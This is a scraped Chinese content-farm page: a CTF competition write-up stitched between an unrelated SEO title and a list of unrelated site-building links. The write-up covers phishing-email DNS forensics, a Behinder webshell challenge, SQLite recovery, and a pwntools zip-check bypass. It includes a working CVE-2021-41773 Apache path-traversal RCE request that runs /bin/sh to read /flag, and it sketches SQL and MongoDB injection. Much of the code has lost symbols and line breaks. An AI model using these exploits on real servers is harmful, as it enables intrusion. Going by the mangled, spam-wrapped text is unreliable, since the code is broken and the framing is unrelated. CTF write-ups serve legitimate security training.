当前位置: 首页 > news >正文

网站查外链wordpress用户上传视频教程

网站查外链,wordpress用户上传视频教程,mk厂手表网站,合肥高端网站建设设计公司文章目录 misc签到钓鱼邮件识别easyshellSecretDBGatewayzipApachef for r webphpsqlMessy Mongo misc 签到 钓鱼邮件识别 两部分解base64#xff0c;各一个flag 后面没有什么地方有有用信息了#xff0c;根据题目钓鱼邮件#xff0c;可能第三段flag就跟DMARC、DKIM 和 SP… 文章目录 misc签到钓鱼邮件识别easyshellSecretDBGatewayzipApachef for r webphpsqlMessy Mongo misc 签到 钓鱼邮件识别 两部分解base64各一个flag 后面没有什么地方有有用信息了根据题目钓鱼邮件可能第三段flag就跟DMARC、DKIM 和 SPF有关了什么是 DMARC、DKIM 和 SPF | Cloudflare (cloudflare-cn.com) 先看DKIM部分kmille/dkim-verify: Verifying a DKIM-Signature by hand (github.com) 解析一下主域名得到提示有三段flag估计就对应DMARC、DKIM 和 SPF三种方法了 照着里面所说构造DKIM的域名 default._domainkey.foobar-edu-cn.com拿到第二段flag _Kn0wH0wt0_思路正确接着照着文章分别构造DMARC跟SPF的域名 _dmarc.foobar-edu-cn.com spf.foobar-edu-cn.com拼一下 flag{N0wY0u_Kn0wH0wt0_ANAlys1sDNS}}easyshell 冰蝎默认密码 下载了加密的temp.zip 后一个 读了secret2.txt 下载下来明文攻击直接打 SecretDB 可以先用fqlite看一遍大概就可以看出flag是根据sort排的当然这一步没有问题也不是很大 定位到数据部分之后一眼看到flag数据接着就是顺序问题了 优先看g{因为这俩在flag{uuid}显然只会出现一次。对比一下可以看出sort字段跟message字段就前后两字节的人话flag数据前一位就是对应顺序 往后再定位一下l会发现他前面对应是0x0F肯定有问题。上两图是比赛时已经改过了的 再看后面的4}ab6deb数据对比前面数据位置会发现偏移了一下应该是l对应的sort字段被删了手动补个0x02即可 with open(secret.db, rb) as f:data f.read()[7879:8193]flag_dict {}for i in range(0, len(data), 8):flag_dict[data[i]] chr(data[i 1]) flag for i in range(0, 42):if i not in flag_dict.keys():flag ?else:flag flag_dict[i] print(flag)#?lag{f6291bf0-923c-4ba6??2d7-ffabba4e8f0b}第一个?肯定是f不用管了仔细核对原来数据发现还有个-也有一字节的偏移位置对应是0x17即第二个问号的位置 因此可以得到剩一个位置不知道 flag{f6291bf0-923c-4ba6-?2d7-ffabba4e8f0b}搜0x18也没有找到后面跟着有效数据的猜测该数据是被删除了直接爆破flag即可最终 flag{f6291bf0-923c-4ba6-82d7-ffabba4e8f0b}Gateway /cgi-bin/baseinfoSet.json里一眼密码 简单处理一下 a10611210110712710110449575653565456495151105561031064956505610310256521011041021055310153102129 print( .join(a.split()))预期解估计是 a10611210110712710110449575653565456495151105561031064956505610310256521011041021055310153102129 for i in a.split():tmp chr(int(i))if tmp.isdigit():print(tmp,end)else:print(chr(int(i)-4),end)2b题下一道 zip 源码只比对了flag{直接拿[del]去截断注意zip和unzip部分token只需要发64位即可 from pwn import * r remote(prob03.contest.pku.edu.cn, 10003) token 523:MEYCIQChFc9bqsFSI9TBeO1FBPx0uap8LyAozcEXSdh3j4T49gIhAN3MG2j3b33B3kuUES0cEmJZqq4WBi_yp54FP90x8cUyr.sendline(token.encode()) recv r.recvuntil(your token:) print(recv.decode())r.sendline(token[:64].encode()) recv r.recvuntil(your flag:) print(recv.decode())exp (flag{ chr(127)*5 token[:64]).encode() r.sendline(exp) r.interactive()Apache apache版本2.4.49 源码 构造一下POST包CVE-2021-41773直接打 import requestsexp f POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1 Host: 1.1.1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 14 Connection: closeecho;cat /flag .replace(\n,\r\n)url rhttps://prob01-2gnkdedc.contest.pku.edu.cn/ncdata f------WebKitFormBoundaryaaaaa Content-Disposition: form-data; nameport80 ------WebKitFormBoundaryaaaaa Content-Disposition: form-data; namedata{exp} ------WebKitFormBoundaryaaaaa--head {Content-Type : multipart/form-data; boundary----WebKitFormBoundaryaaaaa, } test requests.post(url,datadata,headershead).text print(test) f for r GEEKCON 原题 https://qanux.github.io/2024/04/22/geek2024/index.html from ctypes import (windll, wintypes, c_uint64, cast, POINTER, Union, c_ubyte,LittleEndianStructure, byref, c_size_t) import zlib # types and flags DELTA_FLAG_TYPE c_uint64 DELTA_FLAG_NONE 0x00000000 DELTA_APPLY_FLAG_ALLOW_PA19 0x00000001 # structures class DELTA_INPUT(LittleEndianStructure):class U1(Union):_fields_ [(lpcStart, wintypes.LPVOID),(lpStart, wintypes.LPVOID)]_anonymous_ (u1,)_fields_ [(u1, U1),(uSize, c_size_t),(Editable, wintypes.BOOL)] class DELTA_OUTPUT(LittleEndianStructure):_fields_ [(lpStart, wintypes.LPVOID),(uSize, c_size_t)] # functions ApplyDeltaB windll.msdelta.ApplyDeltaB ApplyDeltaB.argtypes [DELTA_FLAG_TYPE, DELTA_INPUT, DELTA_INPUT,POINTER(DELTA_OUTPUT)] ApplyDeltaB.rettype wintypes.BOOL DeltaFree windll.msdelta.DeltaFree DeltaFree.argtypes [wintypes.LPVOID] DeltaFree.rettype wintypes.BOOL gle windll.kernel32.GetLastError def apply_patchfile_to_buffer(buf, buflen, patchpath, legacy):with open(patchpath, rb) as patch:patch_contents patch.read()# most (all?) patches (Windows Update MSU) come with a CRC32 prepended to thefile# we dont really care if it is valid or not, we just need to remove it if itis there# we only need to calculate if the file starts with PA30 or PA19 and then hasPA30 or PA19 after itmagic [bPA30]if legacy:magic.append(bPA19)if patch_contents[:4] in magic and patch_contents[4:][:4] in magic:# we have to validate and strip the crc instead of just stripping itcrc int.from_bytes(patch_contents[:4], little)if zlib.crc32(patch_contents[4:]) crc:# crc is valid, strip it, else dontpatch_contents patch_contents[4:]elif patch_contents[4:][:4] in magic:# validate the header strip the CRC, we dont care about itpatch_contents patch_contents[4:]# check if there is just no CRC at allelif patch_contents[:4] not in magic:# this just isnt validraise Exception(Patch file is invalid)applyflags DELTA_APPLY_FLAG_ALLOW_PA19 if legacy else DELTA_FLAG_NONEdd DELTA_INPUT()ds DELTA_INPUT()dout DELTA_OUTPUT()ds.lpcStart bufds.uSize buflends.Editable Falsedd.lpcStart cast(patch_contents, wintypes.LPVOID)dd.uSize len(patch_contents)dd.Editable Falsestatus ApplyDeltaB(applyflags, ds, dd, byref(dout))if status 0:raise Exception(Patch {} failed with error {}.format(patchpath, gle()))return (dout.lpStart, dout.uSize) if __name__ __main__:import sysimport base64import hashlibimport argparseap argparse.ArgumentParser()mode ap.add_mutually_exclusive_group(requiredTrue)output ap.add_mutually_exclusive_group(requiredTrue)mode.add_argument(-i, --input-file,helpFile to patch (forward or reverse))mode.add_argument(-n, --null, actionstore_true, defaultFalse,helpCreate the output file from a null diff (null diff must be the first one specified))output.add_argument(-o, --output-file,helpDestination to write patched file to)output.add_argument(-d, --dry-run, actionstore_true,helpDont write patch, just see if it would patchcorrectly and get the resulting hash)ap.add_argument(-l, --legacy, actionstore_true, defaultFalse,helpLet the API use the PA19 legacy API (if required))ap.add_argument(patches, nargs, helpPatches to apply)args ap.parse_args()if not args.dry_run and not args.output_file:print(Either specify -d or -o, filesys.stderr)ap.print_help()sys.exit(1)if args.null:inbuf belse:with open(args.input_file, rb) as r:inbuf r.read()buf cast(inbuf, wintypes.LPVOID)n len(inbuf)to_free []try:for patch in args.patches:buf, n apply_patchfile_to_buffer(buf, n, patch, args.legacy)to_free.append(buf)outbuf bytes((c_ubyte*n).from_address(buf))if not args.dry_run:with open(args.output_file, wb) as w:w.write(outbuf)finally:for buf in to_free:DeltaFree(buf)finalhash hashlib.sha256(outbuf)print(Applied {} patch{} successfully.format(len(args.patches), es if len(args.patches) 1 else ))print(Final hash: {}.format(base64.b64encode(finalhash.digest()).decode()))主机、虚拟机试了4种不同curl版本才出来 其他版本都报错 web phpsql 单引号闭合万能密码绕过 Messy Mongo 给了login的patch没一点过滤考虑普通用户登陆之后新建一个ADMIN然后直接利用$toLower去覆盖admin的mongo集合
http://www.zqtcl.cn/news/432791/

相关文章:

  • 西安建设厅网站wpf做网站教程
  • 好的网页网站设计wordpress对外发邮件
  • 湖北网站建设贴吧信用宁波企业网查询
  • 佛山市官网网站建设多少钱网站建设与管理书籍
  • 网站建设佰金手指科杰二八佛山有那几家做网站
  • 网站建设刂搜金手指下拉贰伍wordpress 外链自动nofflow
  • 搭建一个网站多少钱手机软件开发用什么语言
  • 太原专业网站建设杭州网络推广专员
  • 广西专业建网站橙米网站建设
  • 百度做的网站能优化吗html网站系统
  • php素材网站源码免费下载网站维护的内容有哪些
  • 打鱼跟电子游戏网站怎么做佛山微网站开发哪家好
  • 知名的网站建设网站在工信部备案
  • 网站首页的快照更新慢爆wordpress密码
  • dw做网站背景图片设置铺平微博通 wordpress
  • 勉县网站建设电商网站要素
  • 重庆旅游seo整站优化网站制作的一般步骤是什么
  • 网站建设评估体系p2p网站建设框架
  • .net 快速网站开发东莞网站建设公司哪家好
  • 东莞个人网站设计潍坊专业人员继续教育
  • 网站建设如何创业建设招标网官网
  • 公司没有销售网站怎么做业务怎么做微信推送 网站
  • 商城网站模版郴州网页定制
  • 电子商务网站建设步骤海外广告投放渠道
  • 网站用花生壳nas做存储十堰市网站建设
  • 用html5做手机网站抖音平台建站工具
  • 在线课程网站开发的研究意义网站开发需要哪些知识
  • 深圳网站优化怎么做手工艺品外贸出口公司网站建设方案
  • 从网站优化之角度出发做网站策划wordpress邀请码插件
  • 大学营销型网站建设实训课程o2o的四种营销模式